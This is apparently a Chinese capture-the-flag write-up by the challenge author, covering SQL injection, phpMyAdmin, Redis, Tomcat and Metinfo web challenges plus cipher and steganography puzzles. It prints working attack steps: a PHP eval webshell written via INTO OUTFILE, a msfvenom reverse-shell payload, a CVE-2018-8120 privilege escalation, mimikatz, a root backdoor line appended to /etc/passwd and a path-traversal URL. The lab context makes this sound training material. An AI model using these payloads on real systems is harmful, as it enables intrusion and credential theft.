web

100 sql

简单sql注入

直接sqlmap跑 然后找到admin账号密码登录就行。
admin
asf451asf2154sa545
flag{2c8f358dc6241ea721fbea0361e130a3}

python2 sqlmap.py -r 1.txt --technique T -p username -D test -t user -C "username,password" --dump

phpmyadmin

思路

phpmyadmin前台爆破->读取apache配置文件找路径->写shell->提权->->抓密码->flag

弱密码爆破

phpmyadmin密码
root
root123456

默认路径被改,读取apache配置文件找路径

SELECT load_file( "C:/phpStudy/PHPTutorial/Apache/conf/httpd.conf" );

读取到web根目录写shell/修改日志记录getshell

SELECT '<?php @eval($_POST[cmd])?>'
INTO OUTFILE 'C:/phpStudy/PHPTutorial/a6ds523d/shell.php';

拿到shell之后发现并没有对目录读写进行多大限制,权限为apache权限,进行提权。

生成上传msf木马,可以看到有执行权限,反弹msfshell。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=444 -f exe -o 444.exe


这么多随便用一个成功率高的就好。权限虽然是apache但是对目录运行读写权限并没有过多限制,随便来。

我直接用前段时间的2018-8120好用点。

可以看到直接用户是不行的,用8120添加成功并添加管理组。
目标机没有开启3389

看到服务是开启的,那么因该是端口被修改了,找pid2244 最后发现是4399端口。


连接成功

mimikatz抓密码

解密 Administratorhash即为flag

apache Smuwelcome

fl4g itsError

0…day???

数据库

my
123456root

Smuadmin
Smuwahaha123

这题稍微有点坑

可以看到这边扫到了网站的备份

网站是phpcms的,常规思路也是直接就审计上了。

然而等着你的就是这个

真正的点就在这了 redis未授权访问

ssh写公钥、计划任务弹shell已经被我限制了 直接写webshell

普通菜刀直接连接会报错

可以看到木马已经传上去了,命令也是能执行的

但是PHP是高版本,高版本php7.0 过滤一些符号 删除了一些函数
我这里是用的java版连接 蚁剑应该也以

垃圾小王吧

Smuwelcome123

tomcat弱口令getshell -> ssh流量转发 -

运维小王把flag落在没搭建好的环境里了,你能帮他找回吗?

弱口令 admin 123456

jar -cvfM0 hello.war ./

马的内容打包成war上传
菜刀连接 root权限

连上去并没有什么信息,ifconfig下发现有内网网段
arp -a 发现ip 10.10.10.133

nmap扫描扫到开放80 3306端口猜测开放web服务。
由于是server没有图形化界面,通过添加账号ssh转发流量到本地访问。

添加超级用户(没回显一句话添加)

echo "guest:x:0:0::/:/bin/sh" >> /etc/passwd
echo 'guest:123456'|chpasswd


添加成功 root权限

本地做ssh流量转发

可以看到 curl出内容转发成功。本地访问发现是Metinfo6.1

Metinfo6.1->信息泄露读取数据库信息

http://127.0.0.1:11/include/thumb.php?dir=http\..\..\config\config_db.php

mysql -h 127.0.0.1 -P 20 -u root -pSmuwelcome

拿到flag{87ef98219672a78c19bae7954fcd4114}

之后又增加了点难度

限制了端口,不过8080拿到shell后是root权限可以为所欲为自己操作吧。

杂项密码

十三姨穿花衣

39293882298593559195834062835474883832957

十进制转字符串,然后rot3

flag{its-so-easy}

LSB(娘子,啊哈?)

zip爆破Ziperello

密码 2018114

解出图片

Stegsolve神器

有加密信息猜测是lsb隐写

以zip密码尝试分离

flag{72226ef09cf65b883508b2d9a8bec3a8}

共模共计

n = 12163241791483524957316806288597760862288981689931968345271813765985026429745857
e1 = 11
e2 = 1264864681
c = 3079810359319238928727602198449362532122827974473968422037011227516212995430600
c2 = 1067676967051445848402525273436721484419308188939468918925696594850492013554433

脚本

# -*- coding: utf-8 -*-

from libnum import n2s,s2n
from gmpy2 import invert
# 欧几里得算法
def egcd(a, b):
  if a == 0:
return (b, 0, 1)
  else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)

def main():
  n = 12163241791483524957316806288597760862288981689931968345271813765985026429745857
  c1 = 3079810359319238928727602198449362532122827974473968422037011227516212995430600
  c2 = 1067676967051445848402525273436721484419308188939468918925696594850492013554433
  e1 = 11
  e2 = 1264864681
  s = egcd(e1, e2)
  s1 = s[1]
  s2 = s[2]
  # 求模反元素
  if s1<0:
s1 = - s1
c1 = invert(c1, n)
  elif s2<0:
s2 = - s2
c2 = invert(c2, n)

  m = pow(c1,s1,n)*pow(c2,s2,n) % n
  print n2s(m)

if __name__ == '__main__':
  main()

flag{just-s0-s0}

总结

慌慌忙忙准备了一周,第一次做校外的邀请赛比赛中也是出现了很多问题,运维不好做啊!!!环境搭建好上线就出问题,尤其是几道弱密码需要爆破的。服务器也没做维护(虽然内网环境里封了端口到了服务器就没想到…差点被日)题目也是没有太大难度都是这段时间所学,总之师傅们太强了!一首凉凉送给自己。

最后说一句出题人也很不容易,请不要暴打出题人…